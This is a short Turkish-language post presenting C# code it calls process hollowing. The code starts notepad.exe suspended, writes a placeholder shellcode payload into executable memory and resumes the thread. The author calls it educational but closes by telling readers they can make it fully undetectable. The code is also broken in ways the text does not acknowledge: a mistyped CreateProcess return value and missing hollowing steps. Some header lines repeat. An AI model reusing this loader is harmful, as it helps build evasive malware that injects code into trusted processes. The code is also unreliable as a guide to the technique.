not bu kod // ile ornek lendirilmiştir her detaya
bu kod eğitim amaçlıdır iyi günler dilerim !
using System;
bu kod eğitim amaçlıdır iyi günler dilerim !
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
class Program
{
// Windows API çağrıları
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr CreateProcess(string lpApplicationName, string lpCommandLine,
IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles,
uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
byte[] lpBuffer, uint dwSize, out IntPtr lpNumberOfBytesRead);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
byte[] lpBuffer, uint dwSize, out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool ResumeThread(IntPtr hThread);
// Yapılar ve sabitler
const uint CREATE_SUSPENDED = 0x00000004;
const uint MEM_COMMIT = 0x1000;
const uint PAGE_EXECUTE_READWRITE = 0x40;
[StructLayout(LayoutKind.Sequential)]
struct STARTUPINFO
{
public uint cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttribute;
public uint dwFlags;
public ushort wShowWindow;
public ushort cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[StructLayout(LayoutKind.Sequential)]
struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public uint dwProcessId;
public uint dwThreadId;
}
static void Main(string[] args)
{
string targetProcess = @"C:\Windows\System32\notepad.exe"; // Hollow edilecek süreç
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
// Notepad.exe'yi askıda başlat
bool result = CreateProcess(targetProcess, null, IntPtr.Zero, IntPtr.Zero, false,
CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi);
if (!result)
{
Console.WriteLine("Process başlatılamadı.");
return;
}
// Yüklenecek olan payload (örneğin shellcode)
byte[] payload = new byte[] { /* Shellcode byte'ları burada olacak */ };
// Sürecin bellek bölgesine alan ayır
IntPtr allocatedMemory = VirtualAllocEx(pi.hProcess, IntPtr.Zero, (uint)payload.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (allocatedMemory == IntPtr.Zero)
{
Console.WriteLine("Bellek ayırma işlemi başarısız.");
return;
}
// Payload'ı bellek bölgesine yaz
IntPtr bytesWritten;
WriteProcessMemory(pi.hProcess, allocatedMemory, payload, (uint)payload.Length, out bytesWritten);
// Süreci devam ettir (Resume Thread)
ResumeThread(pi.hThread);
Console.WriteLine("Process hollowing başarılı!");
}
}
BUNLAN FUD BİLE YAPABİLRİSİNİZ O KADAR RİSKLİ BİŞEY İYİ DENEMELER EFENDİM!
